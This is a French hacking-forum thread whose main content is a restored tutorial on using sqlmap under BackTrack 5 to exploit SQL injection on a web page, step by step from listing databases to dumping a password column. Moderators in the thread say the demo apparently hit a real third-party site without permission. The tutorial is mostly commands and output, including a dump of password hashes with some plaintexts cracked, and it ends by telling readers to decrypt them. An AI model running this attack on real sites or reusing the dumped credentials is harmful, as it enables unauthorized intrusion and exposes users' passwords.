Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-08-2011 20:16:35

Master-one
Membre Indétronable

Backtrack 5 Revolution tuto SQLmap

redaction ....

[edit modération] Tuto effacé par son auteur, restauré par HappyDad plus bas dans le topic -- antares145

Dernière modification par Master-one (17-09-2011 23:30:32)

935761signiature.jpg

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-08-2011 20:21:34

Master-one
Membre Indétronable

Re : Backtrack 5 Revolution tuto SQLmap

noireaude a écrit :

Wow sacré boulot, merci wink

pas de souci !

935761signiature.jpg

#3 12-08-2011 20:29:43

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Wow sacré boulot, merci wink

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#4 12-08-2011 20:32:25

M1ck3y
Administrateur
Lieu : Lost in the darkness

??

#5 12-08-2011 20:36:33

noireaude
Membre d'honneur
Site Web

C'est moi qui est buggé smile

Par contre je ne sais pas trop quoi penser la je viens de vérifier tes screens il me semble que tu as ciblé un site qui je pense ne t'appartient pas non ?
Tu peux t'expliquer, peut être que je me trompe.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 12-08-2011 20:56:50

konik
Membre d'Or
Lieu : 127.0.0.1

Bon boulot! Merci wink

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

#7 12-08-2011 21:03:24

Master-one
Membre Indétronable

C’est bien pour ça que pour éviter tout souci j'ai effacé ce qui avait à effacer
(désoler de ce petit désagrément très cher) cool

935761signiature.jpg

#8 12-08-2011 21:05:52

M1ck3y
Administrateur

Merci à toi Master-one pour ce tuto complet. J'ai cependant deux reproches à te faire:

-tu n'as visiblement pas réalisé ta démonstration sur un site qui t'appartient (je pars dans l'hypothèse qu'il s'agit d'une démo uniquement et que tu n'es pas allé plus loin, et je te laisse le bénéfice du doute, mais c'est quand meme un peu limite)

-tu ne t'es meme pas donné la peine de flouter le nom de domaine du site d'exemple!

Je vais rectifier cela en stockant les images directement sur le site et en les floutant moi meme, mais fais attention à l'avenir.

#9 12-08-2011 21:09:44

Master-one
Membre Indétronable

je viens de régler le souci  M1ck3y

935761signiature.jpg

#10 12-08-2011 21:10:01

noireaude
Membre d'honneur
Site Web

Ce n'est pas un petit désagrément, c'est pas cool du tout il y en a qui on prit un ban pour bien moins que ça.
Tu aurais pu faire ce tuto en te servant d'un site que tu as monté pour l'occase.

De plus t'attaquer à un site de gériatrie c'est vraiment nul de mon point de vue, mais bon M1ck3y à déjà tranché.

Du coup le wow beau boulot est plus mitigé (bon même si , c'est un tuto bien présenté quand même).

#11 12-08-2011 21:16:57

Master-one
Membre Indétronable

ouais je comprend c'est bien pour cela que je rectifie le sujets ....
j'incite personne pour moi c'est pour aider et d'ailleurs je n'est en aucun qu'a fais quoi se soit Quel intérêt ?,  mais je comprend c'est normal il faut bien des regles .

Dernière modification par Master-one (12-08-2011 21:28:13)

935761signiature.jpg

#12 12-08-2011 21:18:15

tbk-amine
Membre Radioactif
Lieu : sous ubuntu

bon boulot !!

#13 12-08-2011 21:29:59

M1ck3y
Administrateur

Merci d'avoir rectifié sur tes screens, du coup j'ai quand meme mis les images directement sur le site. Ce qu'il faut retenir c'est que nous te remercions tout de meme pour ce boulot car ça part d'une bonne intention, le fait de partager tes connaissances de cette manière est louable et la réalisation d'un tuto demande du travail et du temps MAIS la prochaine fois (oui, maintenant on attend que tu nous fasses d'autres tutos smile ) réalise ton test sur ton propre réseau, en floutant éventuellement tout ce qui peut etre identifiable pour éviter un nouveau quiproquos.

#14 12-08-2011 21:36:01

noireaude
Membre d'honneur
Site Web

Master-one a écrit :

ouais je comprend c'est bien pour cela que je rectifie le sujets ....
j'incite personne pour moi c'est pour aider et d'ailleurs je n'est en aucun qu'a fais quoi se soit Quel intérêt ?,  mais je comprend c'est normal il faut bien des regles .

Faut des règles oui.

Bon malgré tout il est quand même beau ton tuto.
Même très beau smile.

#15 12-08-2011 21:39:13

Master-one
Membre Indétronable

M1ck3y a écrit :

Merci d'avoir rectifié sur tes screens, du coup j'ai quand meme mis les images directement sur le site. Ce qu'il faut retenir c'est que nous te remercions tout de meme pour ce boulot car ça part d'une bonne intention, le fait de partager tes connaissances de cette manière est louable et la réalisation d'un tuto demande du travail et du temps MAIS la prochaine fois (oui, maintenant on attend que tu nous fasses d'autres tutos smile ) réalise ton test sur ton propre réseau, en floutant éventuellement tout ce qui peut etre identifiable pour éviter un nouveau quiproquos.

merci bien, actuellement j'approfondis backrack ( la dernière version) afin de savoir le pour et le contre, et donc il y aura des tutoriaux qui suivront pour diffèrent problème a régler etc ..  cool
sur ceux bonne soirée à vous tous ! et merci encore

Dernière modification par Master-one (12-08-2011 21:41:13)

935761signiature.jpg

#16 13-08-2011 03:56:28

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Merci pour ce tuto wink

#17 13-08-2011 10:43:09

Master-one
Membre Indétronable

N'hésitez pas à me dire si il manque des choses  comme ça je les rajouterait a ce tutoriels..

935761signiature.jpg

#18 13-08-2011 13:34:02

algerino
Membre d'Or

franchement tu nous regale Master-one depuis ton arrivé sur le forum, continue comme ça ! big_smile

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#19 13-08-2011 14:22:33

M1ck3y
Administrateur

Un lien intéressant sur le meme thème: Sqlmap Introduction – SQL Injection Walkthrough

#20 13-08-2011 16:05:19

Master-one
Membre Indétronable

tu fais bien de me donner ça nmap c'est plutôt pratique et plein de paramétré intéressant ! ça aussi je pourrait procéder a un tuto très détailler big_smile .

935761signiature.jpg

#21 25-10-2011 20:12:12

HappyDad
Membre V.I.P.
Lieu : Awus036h
Site Web

A retrouver.

logo-awus036h-petit.png logo-wifi-highpower-175x60.jpg logo-luxury.jpg logo-backtrack-5-special-edition.png

#22 25-10-2011 20:57:35

koala
Membre d'honneur
Lieu : In the sky

Bon désolé mais moi je trouve ça un peu irrespectueux de faire des tutos et de les enlever, MasterOne tu fais un tuto ou tu en fais pas c'est tout.Sur la discussion que j'ai supprimé tu avais carrément dis que tu le laissai jusqu'a mercredi mais je pense pas que les tutos par intérim soit les bienvenue ici.Les gens doivent pouvoir y avoir accès quand ils le veulent et non au dépend de toi MasterOne, n'oublions pas que c'est un forum d'échange...

Essaye de te mettre a la place des gens qui lisent des discussions sans queue ni tete avec un tuto supprimé, heureusement HappyDad est la pour sauver un peu la chose.

Voila c'est mon point de vue, maintenant je ne te banni pas car tes tutos sont de qualité il faut l'admettre, je laisse a notre admin le choix te concernant.

#23 25-10-2011 21:08:37

noireaude
Membre d'honneur
Site Web

Clair je suis du même avis que Koala.

En gros ou tu partages ou tu ne partages pas.
Tu n'es pas à ta première réfléxion entre les tutos hors charte , les duplicates contents et j'en passe.
Que tu veuilles partager ou non je respecte que tu mettes le dawa je respecte plus, alors expliques tes motivations fais un choix ou abstiens toi.

Mais ne te moques pas des gens s'il te plaît, car même si je reste en retrait ces derniers temps j'ai l'oeil partout et je dois dire que je commence à avoir du mal à comprendre ton comportement !!!

#24 25-10-2011 22:03:31

goliate
Membre Irremplaçable
Site Web

o0 je me demander quoi mais en lisant les 2 dernier post j'ai compris, et je partage votre avis.
@masterone pourquoi avoir retiré le tuto?

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#25 01-11-2011 21:10:18

HappyDad
Membre V.I.P.
Lieu : Awus036h
Site Web

[edit modération] Auteur original : Master-One, restauré par HappyDad après effacement volontaire... -- antares145

bonjour tout le monde

mon tutotirel va porter sur sqlmap sous backtrack 5, avant d'aller dans le vif du sujets nous allons comprendre ce qu'est backtrack . BackTrack est une distribution Linux, apparue en janvier 2010. Elle est née de la fusion de Whax et Auditor. Son objectif est de fournir une distribution regroupant l'ensemble des outils nécessaires aux tests de sécurité d'un réseau appeler Pentesting . BackTrack utilise KDE et Gnome comme environnement , supporte plusieurs language de claviers par simple clic (le français s'obtient en sept clics sur le drapeau de la barre KDE), et contient de nombreux outils permettant d'effectuer des tests de sécurité (près de 300). Elle vise à aborder tous les domaines liés aux sécurités modernes. De l'audit réseau à l'analyse et l'identification de vulnérabilité, BackTrack est reconnu par les professionnels de la sécurité informatique comme outil complet. Elle est favorablement connue et utilisée à des fins d'audit de réseaux sans fil Wi-Fi : son développement est en effet axé sur la prise en charge de cartes ou circuits wifi supportant le mode écoute Les outils regroupé (Kismet et autres) mettent en évidence le manque de fiabilité des chiffrements WEP et WPA.

Voilà ce qu'est backrack une distribution linux complet et très professionnels. Passons maintenant à la suite du sujets j'ai personnellement utiliser toute les versions de backrack et j'ai récemment prix la dernier version qui  semble être révolutionnaire cependant je remarque que peu de personne sont alèze avec une tel distribution, du faite que la major partie des utilitaires doivent au préalable être installer sous la forme de commande ( apt-get etc ..)  , pour ma part je trouve cette distribution très ingénieux car c'est plus ou moins réserver au personne qui ont déjà  les connaissances  et l’utilité, dans ce  sujets je vais vous  décrire la procédure pour utiliser Sqlmap un utilitaire d’Audi et application web, mais qui nécessite un peu de connaissance malgré tout

je précise que mon tutoriel n’a pas pour vocation à inciter les gens à l’utiliser à mauvais escient mais à rester dans le cadre de l’instruction individuel et intellectuel merci de votre compréhension.

passons au tutoriel !

1 - Lancer sql map Application ==> BackTrack ==>Exploitation Tools ==> sqlmap

backtrack-sqlmap.jpg
taille HD: http://www.crack-wifi.com/forum/img/ima … sqlmap.jpg

Une fois effectuer , cliqué sur sqlmap vous devriez apercevoir ceci :

sqlmap1.png
taille HD: http://www.crack-wifi.com/forum/img/ima … qlmap1.png

Une fois que vous avez l'interface sqlmap lancé  à la suite de [email protected]:/pentest/database/sqlmap# ça :

python sqlmap.py -u http://tonsite.fr/index.php?id=61 --dbs

alors on va prendre le temps de comprendre c'est commande avant que vous soyez pressez a cliquer sur entré. tout d'abord prenons  la signification de chaque paramètre :

Python sqlmap.py  cela signifie qu’il faut lancer sqlmap en python puisqu'il est codé en python reconnaissable grâce à son extension .py

-u                       cela signifie le paramètre host , c'est à dire  url que vous voulez analyser
-- dbs                  la c'est la commande essentiel pour avancer dans ce tutoriel , ce paramètre permettra d'avoir  la DaTaBaSe

Passons à la suite et faite enter cela va analyser les requêtes potentiellement vulnérables sur url que vous avez indiquée précédemment. Si cela est vulnérable a une faille sql,blind,sql etc... Vous devriez voir la database ou les database, si la faille est béante cela devrait aller vite dans le qu'a contraire attendez le résultat tout simplement, voici un aperçu ::

sqlmap-databases.png
taille HD: http://www.crack-wifi.com/forum/img/ima … abases.png

Donc si vous comprenez et regardé bien on peut apercevoir 2  databases  sous cette forme :

[18:36:02] [INFO] manual usage of GET payloads requires url encoding
[18:36:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 4.0 (etch)
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0
[18:36:02] [INFO] fetching database names
[18:36:02] [INFO] the SQL query used returns 2 entries
[18:36:02] [INFO] retrieved: geront
[18:36:02] [INFO] retrieved: information_schema
available databases [2]:
[*] geront
[*] information_schema

[18:36:02] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.tonsite.fr'

[*] shutting down at: 18:36:02

maintenant nous savons que les database sont nommé geront et information_schema , donc il va falloir avoir obtenir les tables de  ( exemple : geront ) afin de savoir  les mots de passe des utilisateurs .Continuons dans le tutoriel , alors rappeler vous ! On avait effectué précédemment cette commande :

python sqlmap.py -u http://tonsite.fr/index.php?id=61 --dbs

Vous allez maintenant remplacer --dbs par un -D majuscule, le faite de mettre le D signifie que vous voulez rentrer dans une database précises donc suivre la procédure suivante :
(attention petite précision mettre en majuscule c'est important)

python sqlmap.py -u http://tonsite.fr/index.php?id=61 -D geront --tables

--tables pour obtenir les tables de la database geront

(Vous me suivez jusqu'à là ?, personne ne s’est perdu en chemin), une fois cette ligne écrite dans le terminal faite entré vous devriez obtenir ceci :

sqlmap-tables.png
taille HD: http://www.crack-wifi.com/forum/img/ima … tables.png

le résultat :

<=== etc ..
[18:42:35] [INFO] retrieved: contact
[18:42:35] [INFO] retrieved: geront
[18:42:35] [INFO] retrieved: compte
[18:42:35] [INFO] retrieved: geront
[18:42:36] [INFO] retrieved: commentaire
[18:42:36] [INFO] retrieved: geront
[18:42:36] [INFO] retrieved: actu
Database: geront
[10 tables]
+-------------+
| actu        |
| commentaire |
| compte      |
| contact     |
| etat_msg    |
| message     |
| pdf         |
| structure   |
| theme       |
| theme_annu  |
+-------------+

[18:42:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.tonsite.fr'

[*] shutting down at: 18:42:36

Une fois afficher les tables et bien comme toute procédure d'injection SQL il faut avoir les colonnes,  la dans notre exemple on va prendre les colonnes de la tables compte donc nous allons effectuer cette commande :

python sqlmap.py -u http://tonsite.fr/index.php?id=61 -D geront -T compte --columns

Si vous remarqué un petit détail ! On a enlevé --tables ! Pour le remplacer par -T majuscule, et bien  là c'est encore le même procédé que dans le paragraphe  étudier au-dessus afin de préciser la table au quel on veut obtenir les colonnes, faite entré vous devriez voir ceci :

sqlmap-columns.png
Taille HD: http://www.crack-wifi.com/forum/img/ima … olumns.png

Résultat :

Database: geront
Table: compte
[12 columns]
+--------------+------------+
| Column       | Type       |
| adresse      | text       |
| cp           | tinytext   |
| fax          | tinytext   |
| id_compte    | int(11)    |
| id_structure | int(11)    |
| mail         | text       |
| mdp          | text       |
| nom          | tinytext   |
| prenom       | tinytext   |
| tel          | tinytext   |
| type         | tinyint(4) |
| ville        | tinytext   |

[19:09:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.tonsite.fr'

[*] shutting down at: 19:09:55

Maintenant que nous avons les colonnes de la tables comptes nous pouvons procèdes a l'extraction des données de la colonne MDP donc on va procéder comme suite :

python sqlmap.py -u http://tonsite.fr/index.php?id=61 -D geront -T compte -C mdp --dump

là encore nous avons effectué un changement on a enlevez --columns afin de le remplacer par un C majuscule  la encore on cible une colonne précise dans notre exemple c'est MDP et on a rajouter --dump , cette option permet d'extraire les données de la  colonne MDP cela mettra peut être un peu de temps à extraire les données  tout dépend des informations enregistrées , maintenant vous devriez voir ce ci :

sqlmap-dumps.png
Taille HD: http://www.crack-wifi.com/forum/img/ima … -dumps.png

Résultat :

Database:geront            
Table: compte
[21 entries]
+-------------------------------------------+
| mdp                                       |
| 030e3f84029052b4c92fc86fee6092da (garba)  |
| 4a4181fcb0ea8f2399a875fd34667d3c          |
| fa6b2927fa20d1ade81d0514773eadc8          |
| 5b7548b8ed8d548f30fca0ae04833ca7          |
| eadd934e2cc978fc622fc1324878d8af (samsam) |
| df6ef0ae8cdfe75ef0c6b5b044cc774c          |
| 777bbb7869ae8193249f8ff7d3e59afe (lili)   |
| 506497a2e832c2f16d4c3b5ba4206956          |
| 5d933eef19aee7da192608de61b6c23d (titi)   |
| 2a7bf00c40155e783f6d3bedeb3e71a2          |
| d668f682b900272b5b96a2c482a68a17          |
| bddcd1db976c83dda283a5e7189f45b3          |
| 4af0290be110b69c88e25d9345a79c43          |
| 36bcdceaaaae72177a518df55b751806          |
| eadd934e2cc978fc622fc1324878d8af (samsam) |
| 2256caedd70d1b4264592d82a95fc0fe          |
| da1d37daf107817ad837b7c74016b5f4          |
| d3707af7c8ff34c47d32a8b812b14c0c          |
| 9c5dc71f9c3ab4febaa17e7b42553a5b (resid)  |
| d31f821a523cbac41669042c2c935141          |
| 182b7817e82d6eb4a6107a431b92fa2b (yann)   |

[19:32:50] [INFO] Table 'geront.compte' dumped to CSV file '/pentest/database/sqlmap/output/www.tonsite.fr/dump/geront/compte.csv'
[19:32:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.tonsite.fr'

[*] shutting down at: 19:32:50

Il ne vous reste plus qu'a decrypter c'est passe et voila !!

MAIS JE PRÉCISE QUE SE TUTORIEL A POUR BUT ÉDUCATIF ET NON POUR DES FIN ILLÉGAUX

Cordialement

Dernière modification par HappyDad (01-11-2011 21:12:23)

logo-awus036h-petit.png logo-wifi-highpower-175x60.jpg logo-luxury.jpg logo-backtrack-5-special-edition.png

Annonce